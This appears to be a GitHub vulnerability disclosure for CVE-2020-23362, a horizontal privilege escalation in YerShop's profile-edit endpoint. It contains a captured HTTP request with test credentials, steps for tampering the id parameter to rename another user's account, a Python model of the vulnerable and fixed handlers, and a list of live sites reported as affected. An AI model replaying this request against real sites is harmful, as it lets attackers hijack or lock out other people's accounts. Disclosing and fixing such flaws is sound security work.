CVE-2020-23362: Beyond authority loophole in Yershop · Issue #1 · huyiwill/shopcms_lang
Insecure Permissions vulnerability found in Shop_CMS YerShop all versions allows a remote attacker to escalate privileges via the cover_id parameter.
YerShop mall has a horizontal privilege escalation (broken access control) vulnerability: in all versions, a logged-in user can change any other user's username, leaving that user unable to log in to their account.
The accounts and passwords used in the cases below are:
Account 1: lu0r3n
Password: lu0r3n
Account 2: lu0r3n1
Password: lu0r3n
Case 1: http://39.105.34.27/projects/index.php/index/index/index.html
Login page: http://39.105.34.27/projects/index.php/index/user/login.html
Profile edit page: http://39.105.34.27/projects/index.php/index/user/edit.html
Use Burp to intercept the request when saving the profile.
Request:
POST /projects/index.php/index/user/edit.html HTTP/1.1
Host: 39.105.34.27
Content-Length: 66
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://39.105.34.27
Referer: http://39.105.34.27/projects/index.php/index/user/edit.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: j1eU_2132_saltkey=nj6wEe8s; j1eU_2132_lastvisit=1588948355; j1eU_2132_sid=UQR48r; PHPSESSID=174ae4d03e7fb8e838248372b01e3c3f; j1eU_2132_lastact=1588952051%09index.php%09
Connection: close

cover_id=1&username=lu0r3n&sex=%E4%BF%9D%E5%AF%86&birthday=&id=382
Change id=382 to id=381 (account 2's ID is 381, so this edits account 2's username), change username=lu0r3n to hack, and forward the request.
Return to the login page and try to log in with account 2's previous credentials: the user does not exist.
Logging in with the username hack instead of lu0r3n1 succeeds, which proves the vulnerability exists.
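As an added illustration that is not YerShop's code, the following Python model of the profile-edit handler shows the root cause and the fix: the vulnerable variant applies the update to whichever id the client sends in the body, while the hardened variant binds the update to the authenticated session user and refuses (and can log) any request naming a different id. The user table, session ids and function names are constructed for the example.

```python
from urllib.parse import parse_qs

EDITABLE = ("username", "sex", "birthday", "cover_id")


def fresh_users():
    """Constructed user table mirroring the report: account 1 is id 382, account 2 is id 381."""
    return {
        381: {"username": "lu0r3n1", "sex": "", "birthday": "", "cover_id": "0"},
        382: {"username": "lu0r3n", "sex": "", "birthday": "", "cover_id": "0"},
    }


def parse_body(body):
    """Decode an application/x-www-form-urlencoded body into single values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def edit_vulnerable(session_uid, body, users):
    """Trusts the body's id: any logged-in user can rewrite any other user's row."""
    form = parse_body(body)
    target = int(form["id"])  # client-controlled object reference, never checked
    for field in EDITABLE:
        if field in form:
            users[target][field] = form[field]
    return ("ok", target)


def edit_hardened(session_uid, body, users):
    """Binds the update to the session user; a mismatching id is refused.

    The refusal is also the detection signal: a profile edit naming an id other
    than the session owner's is an access-control probe worth alerting on.
    """
    form = parse_body(body)
    if "id" in form and int(form["id"]) != session_uid:
        return ("forbidden", f"user {session_uid} tried to edit user {form['id']}")
    for field in EDITABLE:
        if field in form:
            users[session_uid][field] = form[field]
    return ("ok", session_uid)


if __name__ == "__main__":
    # Account 1 (id 382) replays its own edit request with id rewritten to 381.
    tampered = "cover_id=1&username=hack&sex=%E4%BF%9D%E5%AF%86&birthday=&id=381"
    users = fresh_users()
    print(edit_vulnerable(382, tampered, users), users[381]["username"])  # account 2 renamed
    users = fresh_users()
    print(edit_hardened(382, tampered, users), users[381]["username"])  # refused, unchanged
```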
Case 2: http://www.sqdd.xyz/index.php/index/index/index.html
Login page: http://www.sqdd.xyz/index.php/index/user/login.html
Profile edit page: http://www.sqdd.xyz/index.php/index/user/edit.html
Case 3: http://www.cyawl.com/index.php/index/index/index.html
Login page: http://www.cyawl.com/index.php/index/user/login.html
Profile edit page: http://www.cyawl.com/index.php/index/member/edit.html
Case 4: http://www.dp378.cn/index.php/index/index/index.html
Login page: http://www.dp378.cn/index.php/index/user/login.html
Profile edit page: http://www.dp378.cn/index.php/index/member/edit.html
Case 5: https://demo.yershop.com/index.php/index/index/index.html
Login page: https://demo.yershop.com/index.php/index/user/login.html
Profile edit page: https://demo.yershop.com/index.php/index/user/edit.html
Case 6: http://www.girltoo.com/
Login page: http://www.girltoo.com/index.php?s=/Home/User/login.html
Profile edit page: http://www.girltoo.com/index.php?s=/Home/center/information.html